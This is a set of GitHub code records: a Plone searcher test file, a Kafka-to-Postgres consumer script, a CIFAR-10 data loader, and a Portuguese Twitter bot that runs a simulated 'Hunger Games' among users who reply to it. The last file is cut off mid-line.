+{"seq_id":"20397671119","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for the IWWB Searcher utility.\"\"\"\n\nfrom iwwb.eventlist.tests.base import IntegrationTestCase\nfrom iwwb.eventlist.interfaces import IIWWBSearcher\nfrom zope.component import getUtility\n\nimport mock\nimport unittest2 as unittest\n\n\nclass TestIWWBSearcherMocked(unittest.TestCase):\n \"\"\"Unit test on IWWBSearcher using mocked service results.\"\"\"\n\n @mock.patch('iwwb.eventlist.searcher.Client')\n def test_catch_exception_on_invalid_client(self, suds_client):\n \"\"\"Test an exception is caugth if suds.client.Client() returns one when\n trying to access an invalid SOAP client.\n \"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n suds_client.return_value = None\n suds_client.side_effect = Exception('Invalid SUDS client')\n\n with self.assertRaises(Exception):\n IWWBSearcher()._get_service_client()\n\n @mock.patch('iwwb.eventlist.searcher.IWWBSearcher._get_service_client')\n def test_return_empty_list_for_empty_results(self, _get_service_client):\n \"\"\"An empty list must be returned if we get empty SearchResults.\"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n # IWWB service returns '' if it doesn't find any results\n _get_service_client.return_value.service.GetFullResult.return_value.SearchResults = ''\n\n self.assertEquals(IWWBSearcher().get_results(dict(query='foo')), [])\n\n\nclass TestIWWBSearcherIntegration(IntegrationTestCase):\n \"\"\"Integration test for the IWWBSearcher utility that actually call the\n service and assert results.\n \"\"\"\n\n def setUp(self):\n \"\"\"Custom shared utility setup for tests.\"\"\"\n self.portal = self.layer['portal']\n self.searcher = getUtility(IIWWBSearcher)\n self.searcher.results_per_page = 2\n\n def test_get_results_empty(self):\n # Search for events in a city that doesn't exist\n query = dict(city='FooBar')\n self.assertEquals(self.searcher.get_results(query), [])\n\n def test_get_results_not_empty(self):\n # This search should return some results\n query = dict(city='Berlin')\n self.assertGreater(len(self.searcher.get_results(query)), 0)\n\n def test_get_results_format(self):\n query = dict(city='Berlin')\n results = self.searcher.get_results(query)\n result = results[0]\n\n # See if we can access the attribute values for a result (we can't test\n # other attributes because they are not mandatory), this should not\n # throw an Attribute error.\n result.Rank\n result.Type\n\n def test_get_results_false_parameters(self):\n # Try searching with a nonexistent parameter, the method should fail\n query = dict(foo='bar')\n try:\n self.searcher.get_results(query)\n except:\n pass\n else:\n self.fail(\"get_results did not raise an Exception!\")\n\n\ndef test_suite():\n \"\"\"This sets up a test suite that actually runs the tests in the class\n above.\"\"\"\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"collective/iwwb.eventlist","sub_path":"src/iwwb/eventlist/tests/test_searcher.py","file_name":"test_searcher.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34222842632","text":"import socket\nfrom confluent_kafka import Consumer\nimport json\nimport pandas as pd\nfrom io import StringIO\nimport os\nimport sys\nimport psycopg2\nfrom psycopg2 import sql\n\nconf = {'bootstrap.servers':'172.18.0.3:9092',\n 'group.id':\"topic-to-staging\"}\n\nconsumer1 = Consumer(conf)\n\ndef consumer_func(consumer,topics,max_messages=17000):\n data = []\n message_count = 0\n try:\n consumer.subscribe(topics)\n\n while message_count < max_messages:\n msg = consumer.poll(timeout =1.0)\n if msg is None : continue\n if msg.error():\n print(\"hata var\")\n else:\n json_data = msg.value().decode('utf-8')\n\n python_dict = json.loads(json_data)\n\n data.append(python_dict)\n\n message_count += 1\n except Exception as e:\n # Hata oluştuğunda ne yapılacağını belirleyebilirsiniz.\n print(f'Hata oluştu: {e}')\n return None \n finally:\n dataframe = pd.DataFrame(data)\n consumer.close()\n return dataframe\n\n\ncr_table_sql_script = (f\"CREATE TABLE IF NOT EXISTS staging.example\" +\n \"(Country varchar(200) NULL , Month varchar(50) NULL , Year int NULL, Visitor float NULL);\")\n\n\ndef write_dataframe_to_postgres(dataframe, schema_name='staging', table_name='example'):\n\n try:\n # Veritabanına bağlan\n connection = psycopg2.connect(\n host=\"localhost\",\n user=\"postgres\",\n password=\"1234\",\n database=\"postgres\"\n )\n\n # DataFrame'i CSV formatına dönüştür\n csv_data = dataframe.to_csv(index=False, header=False)\n\n # CSV formatındaki veriyi bir bellek tamponuna yaz\n csv_buffer = StringIO()\n csv_buffer.write(csv_data)\n csv_buffer.seek(0)\n\n # Cursor oluştur\n cursor = connection.cursor()\n cursor.execute(cr_table_sql_script)\n\n # CSV verisini PostgreSQL tablosuna kopyala\n copy_query = sql.SQL(\"COPY {}.{} FROM STDIN WITH CSV\").format(\n sql.Identifier(schema_name),\n sql.Identifier(table_name)\n )\n cursor.copy_expert(sql=copy_query, file=csv_buffer)\n connection.commit()\n print(\"DataFrame başarılı bir şekilde veritabanına aktarıldı.\")\n\n except psycopg2.Error as e:\n print(f\"PSQL Hatası: {e}\")\n\n finally:\n # Bağlantıyı kapat\n if 'connection' in locals():\n connection.close()\n\ndef main():\n try :\n dataframe = consumer_func(consumer=consumer1,topics=[\"staging\"],max_messages=17000)\n if dataframe is not None:\n # BURADA DATAFRAME ÜZERİNDE İŞLEMELER GERÇEKLEŞEBİLİR.\n print(dataframe.head())\n write_dataframe_to_postgres(dataframe)\n else:\n print(\"Topicten Veri alınırken bir hata oluştu\")\n except Exception as e:\n print(f\"Bir Hata Alınıdnı {e}\")\n finally:\n # Consumerı Kapatma İşlemi\n if consumer1 is not None:\n consumer1.close()\n\nif __name__ == '__main__':\n main()","repo_name":"afaruksargin/DataPipelineWithDockerAirflowKafka","sub_path":"py_script/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37648568391","text":"# search_data.py\n# Construct and preprocess data for model\n\nimport torch\nimport torchvision\nfrom torchvision import transforms, datasets\nfrom utils import *\nimport os\nimport random\n\n'''\n Retrieve images from CIFAR-10 dataset using torchvision\n'''\ndef get_cifar_data():\n transform = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform)\n \n # Construct DataLoaders for training and test sets\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=1, shuffle=False, num_workers=1)\n testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1, shuffle=False, num_workers=1)\n\n return trainloader, testloader, trainset\n\ndef index_dataset(trainset):\n feature_indexer = Indexer()\n add_dataset_features(trainset, feature_indexer)\n print(len(feature_indexer))\n\n'''\n Parse and retrieve data from train_path. Also construct an image indexer from index to image_path\n'''\ndef get_ml_data(train_path, train_cutoff=.95):\n indexer = Indexer()\n files = [os.path.join(train_path, p) for p in sorted(os.listdir(train_path))]\n for file in files:\n indexer.get_index(file)\n\n # Generate training and test set - 95% traning, 5% test\n a = [i for i in range(len(files))]\n random.shuffle(a)\n cutoff = int(len(files)*train_cutoff)\n train_data = a[:cutoff]\n test_data = a[cutoff:]\n return train_data, test_data, indexer","repo_name":"SanatSharma/RevSearch","sub_path":"search_data.py","file_name":"search_data.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
+{"seq_id":"207776495","text":"import tweepy\r\nimport emojis\r\nimport random, io, time\r\n\r\nQTDEVENTOS = 3\r\nMAX_LINHAS = 5\r\n\r\narq = open(\"edicao.txt\", \"r\")\r\nfor linha in arq:\r\n edicao = linha\r\narq.close()\r\ntodosEmotes = []\r\nfrasesTXT = open(\"frases.txt\", \"r\")\r\nfrases = []\r\nfor linha in frasesTXT:\r\n frases.append(linha.strip())\r\nfrasesTXT.close()\r\ndesenhosTXT = io.open(\"desenhos.txt\", \"r\")\r\ndesenhos = []\r\nfor linha in desenhosTXT:\r\n desenhos.append(linha.strip())\r\nchavesTXT = open(\"chaves.txt\", \"r\")\r\nchaves = []\r\nfor linha in chavesTXT:\r\n chaves.append(linha.strip())\r\nprint(f'''\r\nConsumer key: {chaves[0]}\r\nConsumer secret: {chaves[1]}\r\nAccess key: {chaves[2]}\r\nAccess secret: {chaves[3]}\r\n\r\nChaves retiradas de 'chaves.txt'\r\nPara acessar as chaves vá em https://developer.twitter.com/en/apps\r\n''')\r\n\r\nconsumer_key = chaves[0]\r\nconsumer_secret = chaves[1]\r\naccess_key = chaves[2]\r\naccess_secret = chaves[3]\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\n\r\ndef esperar(tempo):\r\n print(f\"\\tAguardando {tempo} segundos\")\r\n time.sleep(tempo)\r\n\r\ndef tweetarXmin(texto, tempo):\r\n print(f\"\\tTweetando: \\n{texto}\")\r\n api.update_status(status = texto)\r\n esperar(tempo)\r\n\r\ndef tweetarXminReply(texto, tempo, tweet):\r\n print(f\"Respondendo o útlimo tweet:\\n{texto}\")\r\n api.update_status(status=texto, in_reply_to_status_id=tweet.id)\r\n esperar(tempo)\r\n\r\ndef removeDaListaVivos(lista1, lista2, morre):\r\n for linha in lista1:\r\n if (morre in linha):\r\n linha.remove(morre)\r\n lista2.remove(morre)\r\n return lista1, lista2\r\n\r\ndef anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api):\r\n metade = False\r\n contador = 0\r\n statusText = ''\r\n if (len(mortesDoDia) > 0):\r\n if (len(mortesDoDia) == 1):\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (mortesDoDia[0] in linha):\r\n statusText = f\"hoje fora ouvido apenas um tiro de canhão: \\n@{mortesDoDia[0]} do distrito {i}\\nserá isso bom ou ruim?\"\r\n break\r\n i += 1\r\n else:\r\n statusText = f'Hoje foram ouvidos {len(mortesDoDia)} tiros de canhão a distância:'\r\n for morto in mortesDoDia:\r\n statusText += f\"\\n@{morto} \"\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (morto in linha):\r\n statusText += f\"do distrito {i}\"\r\n break\r\n i += 1\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n metade = True\r\n tweetarXmin(statusText, 10)\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 30 * contador, tweet)\r\n statusText = \"\"\r\n if (not contador % MAX_LINHAS == 0):\r\n if (metade):\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXminReply(statusText, min(30 * contador, 300), tweet)\r\n else:\r\n tweetarXminReply(statusText, min(30), tweet)\r\n statusText = \"\"\r\n else:\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXmin(statusText, min(30 * contador, 300))\r\n else:\r\n tweetarXmin(statusText, 30)\r\n statusText = \"\"\r\n\r\ndef hungerGamesEvent():\r\n\r\n #region Post de inscrição dos tributos (+600 segs)\r\n statusText = f'''\r\nQUE COMECEM OS JOGOS VORAZES {edicao} \r\nPara participar comente algo nesse status, deixe seu grito de guerra, seu 
texto motivacional, qlqr coisa.\r\nVocê será notificado da sua participação\r\n\r\nRT/Fav pra fortalecer o bot <3\r\nAs inscrições terminam em 30 minutos\r\n#JogosVorazes\r\n'''\r\n arq = open(\"edicao.txt\", \"w\")\r\n arq.write(str(int(edicao) + 1))\r\n arq.close()\r\n tweetarXmin(statusText, 1800)\r\n # endregion\r\n\r\n print(\"Pegando nomes do último status\")\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}',result_type=\"recent\", since_id=tweet.id, tweet_mode='extended').items()\r\n #replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}', since_id=tweet.id, tweet_mode='extended').items()\r\n participantesVivos = [[]]\r\n participantesOriginais = [[]]\r\n participantesVivosLista = []\r\n cont = 0\r\n i = 0\r\n '''\r\n while cont < 24:\r\n\r\n #region Juntando os participantes das respostas do ultimo tweet nos vetores de participantes\r\n try:\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n reply = replies.next()\r\n # print(reply.user.screen_name)\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if(adicionado):\r\n continue\r\n participantesVivosLista.append(reply.user.screen_name)\r\n \r\n #cont += 1\r\n except:\r\n print(\"Não há mais replies\")\r\n break\r\n #endregion\r\n '''\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if (participante == reply.user.screen_name):\r\n print(\"Participante já adicionado\")\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n\r\n print(f\"Participantes: {participantesVivosLista}\")\r\n\r\n #region Juntando 24 pessoas aleatórias das que responderam o último tweet (pra não ser os primeiros)\r\n cont = 0\r\n i = 0\r\n if (len(participantesVivosLista) >= 24):\r\n participantesVivosLista = random.sample(participantesVivosLista, 24)\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n if (cont == 24):\r\n break\r\n else:\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n # endregion\r\n\r\n #region Adicionado listas predefinidas para testes\r\n #participantesVivos = 
[['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesOriginais = [['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesVivosLista = ['Gabriel3wefsd','Werneckasfq','Yasminhtyhd','Mayaraffrewg','Lucianosdgvrth','Tutdasgwefgs','Gustavobtgym','Amandaikghd','Pedroryjfs','Maryyxjvfb','Douglasxhjxdh','Caiolmxzsdk','AGabriel3wefsd','AWerneckasfq','AYasminhtyhd','AMayaraffrewg','ALucianosdgvrth','ATutdasgwefgs','AGustavobtgym','AAmandaikghd','APedroryjfs','AMaryyxjvfb','ADouglasxhjxdh','ACaiolmxzsdk']\r\n #cont = 24\r\n #endregion\r\n\r\n\r\n #region Não há pessoas suficientes pra prosseguir o evento, completando com bots!\r\n if (cont < 24):\r\n file = open(\"bots.txt\", \"r\")\r\n bots = file.readlines()\r\n file.close()\r\n qtdBots = 24 - cont\r\n listaBots = random.sample(bots, qtdBots)\r\n while cont < 24:\r\n bot = listaBots.pop()\r\n num = str(random.randint(100,999))\r\n participantesVivos[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesOriginais[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesVivosLista.append(\"Bot\"+bot.strip()+str(num))\r\n if (cont % 2 == 1):\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n print(participantesOriginais)\r\n #endregion\r\n\r\n #region Carregando as frases de 'frases HG.txt' em seus respectivos vetores e misturando os vetores\r\n frasesHGTXT = open(\"frases HG.txt\",\"r\")\r\n momento = \"\"\r\n mataMata, causasNaturais, items, noite, noiteEmDupla = [], [], [], [], []\r\n for linha in frasesHGTXT:\r\n if(linha.strip().isupper()):\r\n momento = linha.strip()\r\n continue\r\n if(momento == \"MATA MATA\"):\r\n mataMata.append(linha.strip())\r\n continue\r\n elif(momento == \"CAUSAS NATURAIS\"):\r\n causasNaturais.append(linha.strip())\r\n continue\r\n elif(momento == \"ITEMS\"):\r\n items.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE\"):\r\n noite.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE EM DUPLA\"):\r\n noiteEmDupla.append(linha.strip())\r\n continue\r\n\r\n frasesHGTXT.close()\r\n cMM, cCN, cI, cN, cNED = 0, 0, 0, 0, 0\r\n mataMata = random.sample(mataMata,len(mataMata))\r\n causasNaturais = random.sample(causasNaturais, len(causasNaturais))\r\n items = random.sample(items, len(items))\r\n noite = random.sample(noite, len(noite))\r\n noiteEmDupla = random.sample(noiteEmDupla, len(noiteEmDupla))\r\n #endregion\r\n\r\n #region Carregando vetores com dizeres quando não acontece o evento\r\n eventoSemTiro = ['Sem tiros de canhão hoje\\n\\nsó isso mesmo','Não houveram mortes hoje','Ninguém morreu hoje\\nimpressionante, mas o jogo tem que continuar :)','Não houveram tiros de canhão hoje\\nserá que hoje os tributos dormem mais tranquilos?', 'Nenhum tiro de canhão foi dado hoje']\r\n eventoSemTiro = random.sample(eventoSemTiro, len(eventoSemTiro))\r\n 
cEST = 0\r\n\r\n    eventoCombatesDiretos = ['Os tributos não se encontraram no soco hoje\nsorte? acho que não\ncoincidência? talvez\nhotel? trivago','Ninguém encontrou ninguém\nNinguém matou ninguém\nsem combates diretos hoje','Não houveram mano a mano hoje\nmas aposto que amanhã vai ter ;)','Vem pro x1! não?\nta, hoje não teve x1']\r\n    eventoCombatesDiretos = random.sample(eventoCombatesDiretos, len(eventoCombatesDiretos))\r\n    cECD = 0\r\n    # endregion\r\n\r\n    #region Apresentação dos tributos, pegar os tributos do vetor dos participantes que entraram no evento (+300 segs)\r\n    statusText = '''Conheçam os tributos:'''\r\n    i = 0\r\n    participantesVivos.pop()\r\n    metade = False\r\n    for linha in participantesVivos:\r\n        statusText += f"\nD{i + 1}:"\r\n        for pessoa in linha:\r\n            statusText += " @"+pessoa+" e"\r\n        statusText = statusText[:-2]+""\r\n        i += 1\r\n        if (i % (len(participantesVivos)/2) == 0 and not metade):\r\n            tweetarXmin(statusText, 30)\r\n            statusText = ""\r\n            metade = True\r\n    statusText += "\nCom isso fecham os tributos selecionados"\r\n    tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n    tweetarXminReply(statusText,300,tweet)\r\n    # endregion\r\n\r\n    acabou = False\r\n    dia = 1\r\n    primeiroMomento = True\r\n    while not acabou:\r\n        aindaNaoMataram = participantesVivosLista.copy()\r\n        mortesDoDia = []\r\n\r\n        #region Primeiro momento, evento de abertura da cornucópia\r\n        if (primeiroMomento):\r\n            primeiroMomento = False\r\n            addSorte = 0\r\n            sorte = 0\r\n            statusText = ""\r\n            dado = random.randint(1,100)\r\n            if (dado % 42 == 0):\r\n                morre = participantesVivosLista[random.randint(0,len(participantesVivosLista) - 1)]\r\n                participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n                mortesDoDia.append(morre)\r\n                statusText += f"\na plataforma de @{morre} explode pq começou se afobou"\r\n            statusText += f"\ncomeça a corrida, alguns se escondem, outros tentam a sorte na cornucopia, sangue rola logo no início"\r\n            while sorte <= 45:\r\n                if (len(aindaNaoMataram) < 2):\r\n                    break\r\n                mata, morre = random.sample(aindaNaoMataram, 2)\r\n                aindaNaoMataram.remove(mata)\r\n                aindaNaoMataram.remove(morre)\r\n\r\n\r\n                participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n                statusText += f"\n@{mata} matou @{morre} {mataMata[cMM]}"\r\n                cMM += 1\r\n                mortesDoDia.append(morre)\r\n\r\n                addSorte += random.randint(10,15)\r\n                sorte = random.randint(0, 100) + addSorte\r\n                if (len(participantesVivosLista) == 1):\r\n                    acabou = True\r\n                    anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n                    break\r\n\r\n\r\n            tweetarXmin(statusText, 150)\r\n        # endregion\r\n\r\n        if (acabou):\r\n            break\r\n\r\n        #region evento de x1 onde pessoa X mata pessoa Y (+30~300 segs)\r\n        addSorte = 0\r\n        sorte = random.randint(0,200)\r\n        contador = 1\r\n        metade = False\r\n        statusText = f"Dia {dia}:"\r\n        if (sorte > 180):\r\n            statusText += "\n" + eventoCombatesDiretos[cECD]\r\n            cECD += 1\r\n        while sorte <= 180:\r\n            if (len(aindaNaoMataram) < 2):\r\n                break\r\n            mata, morre = random.sample(aindaNaoMataram, 2)\r\n            aindaNaoMataram.remove(mata)\r\n            aindaNaoMataram.remove(morre)\r\n\r\n            participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos,\r\n                                                                             participantesVivosLista, morre)\r\n            statusText += f"\n@{mata} matou @{morre} {mataMata[cMM]}"\r\n            cMM += 1\r\n            mortesDoDia.append(morre)\r\n            contador += 
1\r\n\r\n\r\n            addSorte += random.randint(30, 35)\r\n            sorte = random.randint(0, 100) + addSorte\r\n            if (len(participantesVivosLista) == 1):\r\n                acabou = True\r\n                anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n                break\r\n            if (contador % MAX_LINHAS == 0):\r\n                if (not metade):\r\n                    tweetarXmin(statusText, 10)\r\n                    statusText = ''\r\n                    metade = True\r\n                else:\r\n                    tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n                    tweetarXminReply(statusText, 10, tweet)\r\n        if(not contador % MAX_LINHAS == 0):\r\n            if(metade):\r\n                tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n                tweetarXminReply(statusText, min(300, 15*contador), tweet)\r\n            else:\r\n                tweetarXmin(statusText, min(15*contador, 300))\r\n            statusText = ''\r\n        else:\r\n            esperar(min(300, 15*contador))\r\n        #endregion\r\n\r\n        #region Evento morrer sozinho (+15~300 segs)\r\n        addSorte = 0\r\n        sorte = random.randint(0,100)\r\n        contador = 1\r\n        metade = False\r\n        statusText = f"Dia {dia}:"\r\n\r\n        if (sorte > 80):\r\n            statusText = ""\r\n        while sorte <= 75:\r\n            addSorte += random.randint(15, 20)\r\n            sorte = random.randint(0,100) + addSorte\r\n            morre = random.sample(participantesVivosLista, 1)[0]\r\n            participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n            mortesDoDia.append(morre)\r\n            contador += 1\r\n\r\n            statusText += f"\n@{morre} {causasNaturais[cCN]}"\r\n            cCN += 1\r\n            if(len(participantesVivosLista) == 1):\r\n                acabou = True\r\n                anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n                break\r\n            if (contador % MAX_LINHAS == 0):\r\n                if (not metade):\r\n                    tweetarXmin(statusText, 10)\r\n                    statusText = ''\r\n                    metade = True\r\n                else:\r\n                    tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n                    tweetarXminReply(statusText, 10, tweet)\r\n        if(statusText):\r\n            if(not metade):\r\n                tweetarXmin(statusText, 15*contador)\r\n            else:\r\n                esperar(15*contador)\r\n        #endregion\r\n\r\n        #region Patrocinador ajudando (150 segs)\r\n        addSorte = 0\r\n        sorte = random.randint(0,100)\r\n        statusText = f"Dia {dia}:"\r\n        if (sorte <= 10):\r\n            sortudo = random.sample(participantesVivosLista, 1)[0]\r\n            statusText += f"\nolha que sorte\nparece que os patrocinadores estão de olho em @{sortudo} e lhe deram {items[cI]}\nesperamos que saiba como utilizar"\r\n            cI += 1\r\n            tweetarXmin(statusText, 150)\r\n        #endregion\r\n\r\n        #region Anunciar mortos do dia se não tiver terminado o evento\r\n        if(len(mortesDoDia) == 0):\r\n            statusText = eventoSemTiro[cEST]\r\n            cEST += 1\r\n            tweetarXmin(statusText, 180)\r\n        else:\r\n            anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n            if (len(participantesVivosLista) == 1):\r\n                acabou = True\r\n                break\r\n        #endregion\r\n\r\n        #region Evento para os 2 últimos participantes\r\n        if (len(participantesVivosLista) == 2):\r\n            statusText = ""\r\n            dado = random.randint(1, 200)\r\n            if (dado == 99):\r\n                statusText = f'''\r\n@{participantesVivosLista[0]} já não é a mesma pessoa de quando começou.\r\n@{participantesVivosLista[1]} também não está nada bem\r\nambos se encontram na cornucopia\r\nlágrimas escorrem\r\nambos se encaram\r\no destino é certo\r\n...\r\nambos decidem se matar em protesto ao banho de sangue\r\n'''\r\n                tweetarXmin(statusText, 0)\r\n                return None\r\n            mata, morre = random.sample(participantesVivosLista, 2)\r\n\r\n            statusText += f"Os últimos sobreviventes se 
encontram\\nUtilizam de todo seu potencial e\\n@{mata} mata @{morre}\\ntornando-se a última pessoa de pé em uma arena ensanguentada\\nParabéns merecidamente!\\nSigam a página, RT+Fav :]\"\r\n\r\n tweetarXmin(statusText, 0)\r\n return None\r\n #endregion\r\n\r\n #region Evento da noite (30~300 segs)\r\n\r\n addSorte = 0\r\n sorte = random.randint(0, 100)\r\n statusText = f\"Noite {dia}:\"\r\n listaNoite = random.sample(participantesVivosLista, len(participantesVivosLista))\r\n contador = 1\r\n\r\n metade = False\r\n while sorte <= 100:\r\n addSorte += random.randint(15, 30)\r\n sorte = random.randint(0, 60)\r\n dado = random.randint(0, 4)\r\n if (dado):\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} {noite[cN]}\"\r\n cN += 1\r\n elif (len(listaNoite) >= 2 and len(participantesVivosLista) >= 4):\r\n pessoa, dupla = listaNoite.pop(), listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} e @{dupla} {noiteEmDupla[cNED]}\"\r\n cNED += 1\r\n else:\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} achou {items[cI]}\"\r\n cI += 1\r\n if (not listaNoite):\r\n break\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n statusText = ''\r\n if (not metade):\r\n tweetarXmin(statusText, 15 * contador)\r\n else:\r\n esperar(15 * contador)\r\n # endregion\r\n\r\n dia += 1\r\n\r\n #region 1 sobreviveu\r\n vencedor = participantesVivosLista[0]\r\n statusText = f'''\r\nDepois de muita luta, fuga, camuflagem e esperteza\r\nquem sobreviveu foi @{vencedor}\r\n\r\nParabéns, merecidamente\r\n\r\nSigam a página para mais eventos, Fav+RT = Humilde :]\r\n'''\r\n tweetarXmin(statusText, 0)\r\n #endregion\r\n\r\n\r\n\r\ndef tweetToTwitter():\r\n while True:\r\n #emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n\r\n #qlPostar = 2\r\n qlPostar = random.randint(0, QTDEVENTOS - 1)\r\n # DNA Random\r\n if(qlPostar == 0):\r\n emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n statusText = f'''{frases[random.randint(0, 
len(frases)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1